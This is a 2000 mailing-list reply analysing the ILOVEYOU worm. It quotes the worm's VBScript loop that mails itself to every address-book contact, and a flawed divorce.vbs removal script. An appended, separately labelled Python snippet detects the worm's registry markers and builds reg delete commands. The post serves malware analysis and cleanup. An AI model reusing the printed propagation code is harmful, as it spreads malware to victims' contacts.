Vulnerability Development mailing list archives

Re: Opportunist?


From: des () FLOOD PING UIO NO (Dag-Erling Smorgrav)
Date: Fri, 5 May 2000 16:49:10 +0200


"GALES,SIMON (Non-A-ColSprings,ex1)" <george_gales () NON HP COM> writes:
> I took a quick look at it, and was wondering just what it was doing fiddling
> in the MAPI address books... does the ILU worm write to the address book(s)?

No, but it loops through the address book and writes stuff to the
registry for each entry in the address book. Here's the relevant
excerpt from LOVELETTER (my indentation):

    for ctrlists=1 to mapi.AddressLists.Count
        set a=mapi.AddressLists(ctrlists)
        x=1
        regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
        if (regv="") then
            regv=1
        end if
        if (int(a.AddressEntries.Count)>int(regv)) then
            for ctrentries=1 to a.AddressEntries.Count
                malead=a.AddressEntries(x)
                regad=""
                regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
                if (regad="") then
                    set male=out.CreateItem(0)
                    male.Recipients.Add(malead)
                    male.Subject = "ILOVEYOU"
                    male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
                    male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
                    male.Send
                    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
                end if
                x=x+1
            next
            regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
        else
            regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
        end if
    next

The corresponding code in divorce.vbs is supposed to remove those
entries, but the crucial line is commented out. It looks like the
authors just cut&pasted code from LOVELETTER and changed some words
here and there to reverse the effect. Here's the relevant excerpt from
divorce.vbs (authors' indentation):

    for ctrlists=1 to mapi.AddressLists.Count
        set a=mapi.AddressLists(ctrlists)
        x=1

        if (int(a.AddressEntries.Count)>1) then

            for ctrentries=1 to a.AddressEntries.Count
                malead=a.AddressEntries(x)
                regad=""
                regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)

                    if (not regad="") then
                        log_to_disk("Deleting HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
!                       rem regedit.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead
                    end if

                x=x+1
            next

        end if
    next

The line with a bang in the margin would remove the registry entries
created by LOVELETTER, if it weren't commented out.

> This script/batchfile only cleans up .vbs files, but I seem to remember
> someone mentioning overwritten .js/.mp3 files among others? Or is it just
> my end-of-week fogginess?

LOVELETTER deletes mp3 etc. files, and replaces them with .vbs files
with the same name, so the offending files all end with .vbs.

DES

--
Dag-Erling Smorgrav - des () flood ping uio no
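Added here as an example (not code from the thread, from LOVELETTER or from divorce.vbs): a defender-side check that reads a `reg export` of the WAB key, flags the marker values the LOVELETTER loop above leaves behind, and produces the reg.exe deletions that divorce.vbs was supposed to perform. The .reg sample and the function names are constructed for this example; matching address-shaped value names holding DWORD 1, and list names holding a numeric string, is a heuristic taken from the excerpt, not a documented WAB format.

```python
import re

# Constructed sample of a `reg export "HKCU\Software\Microsoft\WAB"` dump; not a real capture.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\WAB]
"Global Address List"="3"
"alice@example.com"=dword:00000001
"bob@example.com"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4]
"FirstRun"=dword:00000000
"""

WAB_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\WAB"
SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.+)$')
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+$")

def parse_reg_export(text):
    """Map each key path in a .reg export to a list of (value name, raw data)."""
    keys, current = {}, None
    for line in text.splitlines():
        sec = SECTION_RE.match(line.strip())
        if sec:
            current = sec.group(1)
            keys.setdefault(current, [])
            continue
        val = VALUE_RE.match(line.strip())
        if val and current is not None:
            keys[current].append((val.group("name"), val.group("data")))
    return keys

def find_loveletter_markers(text):
    """Heuristic from the LOVELETTER excerpt: a REG_DWORD 1 named after each recipient
    (its 'already mailed' flag) and a REG_SZ count named after each address list."""
    recipients, lists = [], []
    for name, data in parse_reg_export(text).get(WAB_KEY, []):
        if EMAIL_RE.match(name) and data.lower() == "dword:00000001":
            recipients.append(name)
        elif re.fullmatch(r'"\d+"', data):
            lists.append(name)
    return recipients, lists

def cleanup_commands(text):
    """reg.exe lines deleting only the marker values (the step divorce.vbs commented out)."""
    recipients, lists = find_loveletter_markers(text)
    return [f'reg delete "HKCU\\Software\\Microsoft\\WAB" /v "{name}" /f' for name in recipients + lists]
```

Subkeys such as WAB4 and any value that does not fit the pattern are left untouched, so the output is a reviewable list rather than a blanket key deletion.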